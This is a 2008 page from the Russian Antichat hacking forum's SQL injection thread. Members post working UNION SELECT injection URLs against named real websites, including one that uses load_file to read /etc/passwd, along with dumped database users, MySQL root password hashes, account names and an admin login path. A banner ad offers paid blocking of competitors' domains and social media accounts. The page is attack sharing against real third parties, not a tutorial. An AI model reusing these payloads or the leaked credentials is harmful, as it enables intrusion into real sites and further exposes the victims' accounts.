Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 606 из 1242

606

Опции темы

Поиск в этой теме

Опции просмотра

#6051

21.07.2008, 16:52

tor4)

Познающий

Регистрация: 27.05.2008

Сообщений: 51

Провел на форуме:
611529

Репутация: 41

)) спс.

вывод есть как из комментариев так и в название

шел почемуто не нашол.

Последний раз редактировалось tor4); 21.07.2008 в 18:18..

#6052

21.07.2008, 20:22

Cmucl

Новичок

Регистрация: 21.06.2008

Сообщений: 17

Провел на форуме:
153953

Репутация: 18

http://www.inderscience.com/

Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database name: papers
User name: santiago@localhost

[1]:root:01957ef668e6d197
[2]:root:
[3]:debian-sys-maint:6b67408243591682
[4]:santiago:67988dfe49fa907a
[5]:gringo:6b39e3a056217c98
[6]:idsonsusy:20cc5448310bcc55
[7]:webmaster:11e578da277c0f17
[8]:bizshoe:2bf7d9725ea14fce

http://www.inderscience.com/mapper.php?id=31 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6 A626567696E,LOAD_FILE(0x2F7661722F7777772F61706163 6865322D64656661756C742F6874646F63732F696E6465782E 706870),0x7873716C696E6A656E64),0x71),0x71) LIMIT 1,1/* - чтение сорсов.

Google Page Rank - 7

Последний раз редактировалось Cmucl; 22.07.2008 в 03:22..

#6053

21.07.2008, 21:07

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

Отправить сообщение для Calcutta с помощью ICQ

http://chelzoo.ru/board_more.php?start=3296&rub=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),user())--

4.0.27
chelzooru@localhost

#6054

22.07.2008, 00:58

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

www.ub.bw PR-6

version() - 5.0.51
file_priv - Y

к сожалению ковычки фильтруются, обходим их с помощью ASCII кодов...

PHP код:


		
			
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user

PHP код:


		
			
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user

Цитата:

root:*605A9A272BF59FE166F769C3536B032DD66858F6
webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
root:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A

Два рута =)

#6055

22.07.2008, 18:56

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/*

database() = adacorg@64.13.232.25
user() = adac_org_au_-_content
version() = 4.1.11-Debian_4sarge7

вход в админку
www.adac.org.au/intranet.php

не подобрал поле пароля ..

пользователи:
5:jimmy
2:francz
3:helen
4:scott
6:byron
7:katie
8:warren
9:geoff
10:sharon

http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid, username),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*

#6056

22.07.2008, 20:40

Saiga

Познающий

Регистрация: 22.07.2008

Сообщений: 49

Провел на форуме:
170912

Репутация: -4

Vsem prijatnogo vremeni sutak

ja vot nashol forum : http://89.136.42.95
No nekak nemogu razobratsa kak zdelot SQL injection . Moshet ktonibut obesnit

#6057

22.07.2008, 21:02

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

Saiga

Там нельзя ее сделать (вроде) ошибки на главной это просто какие то ошибки с обработкой базы mysql
А вообще тут на против есть тема для вопросов вот туда лучше обратиться

#6058

22.07.2008, 21:04

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid, username,userpass),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*

#6059

22.07.2008, 22:01

Mo4x

Постоянный

Регистрация: 18.02.2007

Сообщений: 416

Провел на форуме:
3509350

Репутация: 412

kaspersky.fr

Цитата:

http://presse.kaspersky.fr/presse.php?type=&article=&bibid=171%20UNION%20SELE CT%20AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E 6A626567696E,TABLE_NAME,0x7873716C696E6A64656C,TAB LE_SCHEMA,0x7873716C696E6A656E64),0x71),0x71),2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20INFORMAT ION_SCHEMA.TABLES%20LIMIT%2016,1/*

Version:5.0.38
User:adminsql@localhost

Помогите раскрутить инъекцию

Последний раз редактировалось Mo4x; 22.07.2008 в 22:04..

#6060

22.07.2008, 22:08

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

http://www.zavodmonolit.ru/photos/index.php?id_group=-111/**/union/**/select/**/1,concat_ws(0x3a,table_name)+from+information_sche ma.tables+limit+22,1--
на ваш страх и риск -)
раскрутить не вышло или я что-то не так делаю Х_х

Страница 606 из 1242

606

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход